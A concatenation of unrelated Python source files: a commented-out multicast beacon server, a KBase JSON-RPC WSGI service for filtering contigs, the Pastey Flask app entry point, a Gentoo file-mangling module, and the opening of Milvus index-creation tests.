# # data = returned message info
# # server = ip:port, which is x.x.x.x:9990
# data, server = self.sock.recvfrom(1024)
# data = self.handler.loads(data)
# # print('>> Search:', data, server)
# servicesFound = data
# break
# # if len(data) == 2:
# # servicesFound = (zmqTCP(server[0], data[0]), zmqTCP(server[0], data[1]),)
# # break
# except socket.timeout:
# print("*** timeout ***")
# break
# # print(">> search done")
# return servicesFound
#
# class BeaconServer(BeaconBase):
# """A simple multicast listener which responds to
# requests for services it has
#
# # message to be transmitted via multicast
# msg = {'something': 123, 'other': 'abc'}
#
# # create a server
# provider = BeaconServer(
# 'hostname',
# callback_function [optional], # ??
# handler # ??
# )
#
# provider.start()
# try:
# while True:
# time.sleep(500)
# except KeyboardInterrupt:
# provider.stop()
#
# """
# def __init__(self, key, callback=None, handler=Ascii, ttl=1, addr=None):
# BeaconBase.__init__(self, key=key, ttl=ttl)
#
# if addr is not None:
# if len(addr) == 2:
# self.mcast_addr = addr[0]
# self.mcast_port = addr[1]
#
# # setup service socket
# # allow multiple connections
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# try:
# self.sock.bind(('0.0.0.0', self.mcast_port))
# # self.sock.bind((self.mcast_addr, self.mcast_port))
# except OSError as e:
# print("*** {} ***".format(e))
# raise
#
# mreq = struct.pack("=4sl", socket.inet_aton(self.mcast_addr), socket.INADDR_ANY)
# self.sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, mreq)
#
# # setup server data
# # self.services = {} # services
# self.callback = callback
# self.handler = handler() # serialization method
#
# # setup thread
# # self.exit = False
# # self.listener = threading.Thread(target=self.listenerThread)
#
# # def start(self):
# # """Start the listener thread"""
# # self.listener.setDaemon(True)
# # self.listener.start()
# #
# # def stop(self):
# # """Stop the listener thread"""
# # self.exit = True
# #
# # def listen(self):
# # """TBD"""
# # pass
#
# def run(self):
# # self.sock.setblocking(0)
#
# ip = GetIP().get()
# print("<<< beacon ip: {} >>>".format(ip))
#
# # while self.exit is False:
# while True:
# # print('-'*40)
# # for k,v in self.services.items():
# # print("{}: {}".format(k,v))
# #
# # if self.exit is True:
# # break
# # else:
# # time.sleep(0.2)
# try:
# # time.sleep(0.2)
# data, address = self.sock.recvfrom(1024)
# except KeyboardInterrupt:
# print("ctrl-z")
# return
# except Exception:
# continue
#
# data = self.handler.loads(data)
# # print(">> Address: {}".format(address))
# # print(">> Data: {}".format(data))
#
# if self.key == data[0]:
# if self.callback:
# msg = self.callback(data, address)
# # print("MM:",msg)
# if msg:
# msg = self.handler.dumps(msg)
# self.sock.sendto(msg, address)
# # print(">> beacon sent: {}".format(msg))
# # else:
# # msg = self.handler.dumps(('hello',))
# # self.sock.sendto(msg, address)
|
jcatlett_ContigFilterServer.py
|
#!/usr/bin/env python
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, ServerError, InvalidRequestError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import biokbase.nexus
import requests as _requests
import urlparse as _urlparse
import random as _random
import os
import requests.packages.urllib3
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jcatlett_ContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from jcatlett_ContigFilter.jcatlett_ContigFilterImpl import jcatlett_ContigFilter
impl_jcatlett_ContigFilter = jcatlett_ContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
sync_methods = {}
async_run_methods = {}
async_check_methods = {}
async_run_methods['jcatlett_ContigFilter.filter_contigs_async'] = ['jcatlett_ContigFilter', 'filter_contigs']
async_check_methods['jcatlett_ContigFilter.filter_contigs_check'] = ['jcatlett_ContigFilter', 'filter_contigs']
sync_methods['jcatlett_ContigFilter.filter_contigs'] = True
async_run_methods['jcatlett_ContigFilter.filter_contigs_max_async'] = ['jcatlett_ContigFilter', 'filter_contigs_max']
async_check_methods['jcatlett_ContigFilter.filter_contigs_max_check'] = ['jcatlett_ContigFilter', 'filter_contigs_max']
sync_methods['jcatlett_ContigFilter.filter_contigs_max'] = True
class AsyncJobServiceClient(object):
def __init__(self, timeout=30 * 60, token=None,
ignore_authrc=True, trust_all_ssl_certificates=False):
url = environ.get('KB_JOB_SERVICE_URL', None)
if url is None and config is not None:
url = config.get('job-service-url')
if url is None:
raise ValueError('Neither \'job-service-url\' parameter is defined in '+
'configuration nor \'KB_JOB_SERVICE_URL\' variable is defined in system')
scheme, _, _, _, _, _ = _urlparse.urlparse(url)
if scheme not in ['http', 'https']:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
self.trust_all_ssl_certificates = trust_all_ssl_certificates
if token is None:
raise ValueError('Authentication is required for async methods')
self._headers['AUTHORIZATION'] = token
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def _call(self, method, params, json_rpc_call_context = None):
arg_hash = {'method': method,
'params': params,
'version': '1.1',
'id': str(_random.random())[2:]
}
if json_rpc_call_context:
arg_hash['context'] = json_rpc_call_context
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
ret = _requests.post(self.url, data=body, headers=self._headers,
timeout=self.timeout,
verify=not self.trust_all_ssl_certificates)
if ret.status_code == _requests.codes.server_error:
if 'content-type' in ret.headers and ret.headers['content-type'] == 'application/json':
err = json.loads(ret.text)
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, ret.text)
else:
raise ServerError('Unknown', 0, ret.text)
if ret.status_code != _requests.codes.OK:
ret.raise_for_status()
resp = json.loads(ret.text)
if 'result' not in resp:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
return resp['result']
def run_job(self, run_job_params, json_rpc_call_context = None):
return self._call('KBaseJobService.run_job', [run_job_params], json_rpc_call_context)[0]
def check_job(self, job_id, json_rpc_call_context = None):
return self._call('KBaseJobService.check_job', [job_id], json_rpc_call_context)[0]
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = ServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.__str__()
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'jcatlett_ContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_jcatlett_ContigFilter.filter_contigs,
name='jcatlett_ContigFilter.filter_contigs',
types=[dict])
self.method_authentication['jcatlett_ContigFilter.filter_contigs'] = 'required'
self.rpc_service.add(impl_jcatlett_ContigFilter.filter_contigs_max,
name='jcatlett_ContigFilter.filter_contigs_max',
types=[dict])
self.method_authentication['jcatlett_ContigFilter.filter_contigs_max'] = 'required'
self.auth_client = biokbase.nexus.Client(
config={'server': 'nexus.api.globusonline.org',
'verify_ssl': True,
'client': None,
'client_secret': None})
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {'call_stack': [{'time':self.now_in_utc(), 'method': req['method']}]}
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
if method_name in async_run_methods:
method_name = async_run_methods[method_name][0] + "." + async_run_methods[method_name][1]
if method_name in async_check_methods:
method_name = async_check_methods[method_name][0] + "." + async_check_methods[method_name][1]
auth_req = self.method_authentication.get(method_name,
"none")
if auth_req != "none":
if token is None and auth_req == 'required':
err = ServerError()
err.data = "Authentication required for " + \
"jcatlett_ContigFilter but no authentication header was passed"
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user, _, _ = \
self.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = ServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
method_name = req['method']
if method_name in async_run_methods or method_name in async_check_methods:
if method_name in async_run_methods:
orig_method_pair = async_run_methods[method_name]
else:
orig_method_pair = async_check_methods[method_name]
orig_method_name = orig_method_pair[0] + '.' + orig_method_pair[1]
if 'required' != self.method_authentication.get(orig_method_name, 'none'):
err = ServerError()
err.data = 'Async method ' + orig_method_name + ' should require ' + \
'authentication, but it has authentication level: ' + \
self.method_authentication.get(orig_method_name, 'none')
raise err
job_service_client = AsyncJobServiceClient(token = ctx['token'])
if method_name in async_run_methods:
run_job_params = {
'method': orig_method_name,
'params': req['params']}
if 'rpc_context' in ctx:
run_job_params['rpc_context'] = ctx['rpc_context']
job_id = job_service_client.run_job(run_job_params)
respond = {'version': '1.1', 'result': [job_id], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
else:
job_id = req['params'][0]
job_state = job_service_client.check_job(job_id)
finished = job_state['finished']
if finished != 0 and 'error' in job_state and job_state['error'] is not None:
err = {'error': job_state['error']}
rpc_result = self.process_error(err, ctx, req, None)
else:
respond = {'version': '1.1', 'result': [job_state], 'id': req['id']}
rpc_result = json.dumps(respond, cls=JSONObjectEncoder)
status = '200 OK'
elif method_name in sync_methods or (method_name + '_async') not in async_run_methods:
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
else:
err = ServerError()
err.data = 'Method ' + method_name + ' cannot be run synchronously'
raise err
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception, e:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'The request method was %s\n' % environ['REQUEST_METHOD']
# print 'The environment dictionary is:\n%s\n' % pprint.pformat(environ) @IgnorePep8
# print 'The request body was: %s' % request_body
# print 'The result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
if 'error' not in error['error'] or error['error']['error'] is None:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh,mm = divmod((delta.days * 24*60*60 + delta.seconds + 30) // 60, 60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {
'': application
}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user, _, _ = application.auth_client.validate_token(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception, e:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
if len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1]):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
app.py
|
from flask import Flask, render_template, request, redirect, abort
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from os import environ
from distutils.util import strtobool
from threading import Thread
pastey_version = "0.3"
loaded_config = {}
loaded_themes = []
app = Flask(__name__)
limiter = Limiter(
app,
key_func=get_remote_address
)
from pastey import config, common, routes, functions
# Check environment variable overrides
config.data_directory = environ["PASTEY_DATA_DIRECTORY"] if "PASTEY_DATA_DIRECTORY" in environ else config.data_directory
config.listen_address = environ["PASTEY_LISTEN_ADDRESS"] if "PASTEY_LISTEN_ADDRESS" in environ else config.listen_address
config.listen_port = environ["PASTEY_LISTEN_PORT"] if "PASTEY_LISTEN_PORT" in environ else config.listen_port
config.use_whitelist = bool(strtobool(environ["PASTEY_USE_WHITELIST"])) if "PASTEY_USE_WHITELIST" in environ else config.use_whitelist
config.restrict_pasting = bool(strtobool(environ["PASTEY_RESTRICT_PASTING"])) if "PASTEY_RESTRICT_PASTING" in environ else config.restrict_pasting
config.restrict_raw_pasting = bool(strtobool(environ["PASTEY_RESTRICT_RAW_PASTING"])) if "PASTEY_RESTRICT_RAW_PASTING" in environ else config.restrict_raw_pasting
config.guess_threshold = float(environ["PASTEY_GUESS_THRESHOLD"]) if "PASTEY_GUESS_THRESHOLD" in environ else config.guess_threshold
config.recent_pastes = int(environ["PASTEY_RECENT_PASTES"]) if "PASTEY_RECENT_PASTES" in environ else config.recent_pastes
config.whitelist_cidr = environ["PASTEY_WHITELIST_CIDR"].split(",") if "PASTEY_WHITELIST_CIDR" in environ else config.whitelist_cidr
config.blacklist_cidr = environ["PASTEY_BLACKLIST_CIDR"].split(",") if "PASTEY_BLACKLIST_CIDR" in environ else config.blacklist_cidr
config.behind_proxy = bool(strtobool(environ["PASTEY_BEHIND_PROXY"])) if "PASTEY_BEHIND_PROXY" in environ else config.behind_proxy
config.default_theme = environ["PASTEY_DEFAULT_THEME"] if "PASTEY_DEFAULT_THEME" in environ else config.default_theme
config.purge_interval = int(environ["PASTEY_PURGE_INTERVAL"]) if "PASTEY_PURGE_INTERVAL" in environ else config.purge_interval
config.force_show_recent = bool(strtobool(environ["PASTEY_FORCE_SHOW_RECENT"])) if "PASTEY_FORCE_SHOW_RECENT" in environ else config.force_show_recent
config.ignore_guess = environ["PASTEY_IGNORE_GUESS"].split(",") if "PASTEY_IGNORE_GUESS" in environ else config.ignore_guess
config.show_cli_button = bool(strtobool(environ["PASTEY_SHOW_CLI_BUTTON"])) if "PASTEY_SHOW_CLI_BUTTON" in environ else config.show_cli_button
# Main loop
if __name__ == "__main__":
# Print configuration
print("=====================================")
print("Pastey version ", pastey_version)
print("USING THE FOLLOWING CONFIGURATION:")
print("=====================================")
for option in dir(config):
if not option.startswith("__"):
loaded_config[option] = eval("config.%s" % option)
print(option, ": ", loaded_config[option])
print("=====================================")
# Register error handlers
app.register_error_handler(404, routes.page_not_found)
app.register_error_handler(401, routes.unauthorized)
# Start purging expired pastes thread
purge_thread = Thread(target=functions.purge_expired_pastes, daemon=True)
purge_thread.start()
app.run(host=config.listen_address, port=config.listen_port)
|
mangle.py
|
"""Formatting and file mangling support."""
import functools
import multiprocessing
import os
import re
import signal
import traceback
from datetime import datetime
from snakeoil.cli.exceptions import UserException
from snakeoil.mappings import OrderedSet
copyright_regex = re.compile(
r'^# Copyright (?P<date>(?P<begin>\d{4}-)?(?P<end>\d{4})) (?P<holder>.+)$')
keywords_regex = re.compile(
r'^(?P<pre>[^#]*\bKEYWORDS=(?P<quote>[\'"]?))'
r'(?P<keywords>.*)'
r'(?P<post>(?P=quote).*)$')
def mangle(name):
"""Decorator to register file mangling methods."""
class decorator:
"""Decorator with access to the class of a decorated function."""
def __init__(self, func):
self.func = func
def __set_name__(self, owner, name):
owner._mangle_funcs[name] = self.func
setattr(owner, name, self.func)
return decorator
class Mangler:
"""File-mangling iterator using path-based parallelism."""
# mapping of mangling types to functions
_mangle_funcs = {}
def __init__(self, changes, skip_regex=None):
self.jobs = os.cpu_count()
if skip_regex is not None:
changes = (c for c in changes if not skip_regex.match(c.full_path))
self.changes = OrderedSet(changes)
# setup for parallelizing the mangling procedure across files
self._mp_ctx = multiprocessing.get_context('fork')
self._mangled_paths_q = self._mp_ctx.SimpleQueue()
self._current_year = str(datetime.today().year)
# initialize settings used by iterator support
self._runner = self._mp_ctx.Process(target=self._run)
signal.signal(signal.SIGINT, self._kill_pipe)
self._mangled_paths = iter(self._mangled_paths_q.get, None)
# construct composed mangling function
self.composed_func = functools.reduce(
lambda f, g: lambda x: f(g(self, x)), self._mangle_funcs.values(), lambda x: x)
@mangle('EOF')
def _eof(self, change):
"""Drop EOF whitespace and forcibly add EOF newline."""
return change.update(change.data.rstrip() + '\n')
@mangle('keywords')
def _keywords(self, change):
"""Fix keywords order."""
def keywords_sort_key(kw):
return tuple(reversed(kw.lstrip('-~').partition('-')))
lines = change.data.splitlines()
for i, line in enumerate(lines):
if mo := keywords_regex.match(line):
kw = sorted(mo.group('keywords').split(), key=keywords_sort_key)
new_kw = ' '.join(kw)
if not mo.group('quote'):
new_kw = f'"{new_kw}"'
lines[i] = f'{mo.group("pre")}{new_kw}{mo.group("post")}'
break
return change.update('\n'.join(lines) + '\n')
def _kill_pipe(self, *args, error=None):
"""Handle terminating the mangling process group."""
if self._runner.is_alive():
os.killpg(self._runner.pid, signal.SIGKILL)
if error is not None:
# propagate exception raised during parallelized mangling
raise UserException(error)
raise KeyboardInterrupt
def __iter__(self):
# start running the mangling processes
self._runner.start()
return self
def __next__(self):
try:
path = next(self._mangled_paths)
except StopIteration:
self._runner.join()
raise
# Catch propagated, serialized exceptions, output their
# traceback, and signal the scanning process to end.
if isinstance(path, list):
self._kill_pipe(error=path[0])
return path
def _mangle(self, change):
"""Run composed mangling function across a given change."""
if orig_data := change.read():
change = self.composed_func(change)
if change.data != orig_data:
change.sync()
return change
def _run_manglers(self, paths_q):
"""Consumer that runs mangling functions, queuing mangled paths for output."""
try:
for change in iter(paths_q.get, None):
if mangled_change := self._mangle(change):
self._mangled_paths_q.put(mangled_change.path)
except Exception: # pragma: no cover
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
self._mangled_paths_q.put([tb])
def _run(self):
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.setpgrp()
paths_q = self._mp_ctx.SimpleQueue()
pool = self._mp_ctx.Pool(self.jobs, self._run_manglers, (paths_q,))
pool.close()
# queue paths for processing
for change in self.changes:
paths_q.put(change)
# notify consumers that no more work exists
for i in range(self.jobs):
paths_q.put(None)
pool.join()
# notify iterator that no more results exist
self._mangled_paths_q.put(None)
class GentooMangler(Mangler):
"""Gentoo repo specific file mangler."""
_mangle_funcs = Mangler._mangle_funcs.copy()
@mangle('copyright')
def _copyright(self, change):
"""Fix copyright headers and dates."""
lines = change.data.splitlines()
if mo := copyright_regex.match(lines[0]):
groups = mo.groupdict()
if groups['begin'] is None and groups['date'] != self._current_year:
# use old copyright date as the start of date range
date_range = f"{groups['date']}-{self._current_year}"
lines[0] = re.sub(groups['date'], date_range, lines[0])
else:
lines[0] = re.sub(mo.group('end'), self._current_year, lines[0])
lines[0] = re.sub('Gentoo Foundation', 'Gentoo Authors', lines[0])
return change.update('\n'.join(lines) + '\n')
|
test_index.py
|
"""
For testing index operations, including `create_index`, `describe_index` and `drop_index` interfaces
"""
import logging
import pytest
import time
import pdb
import threading
from multiprocessing import Pool, Process
import numpy
import sklearn.preprocessing
from milvus import IndexType, MetricType
from utils import *
nb = 6000
dim = 128
index_file_size = 10
vectors = gen_vectors(nb, dim)
vectors = sklearn.preprocessing.normalize(vectors, axis=1, norm='l2')
vectors = vectors.tolist()
BUILD_TIMEOUT = 300
nprobe = 1
tag = "1970-01-01"
NLIST = 4046
INVALID_NLIST = 100000000
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
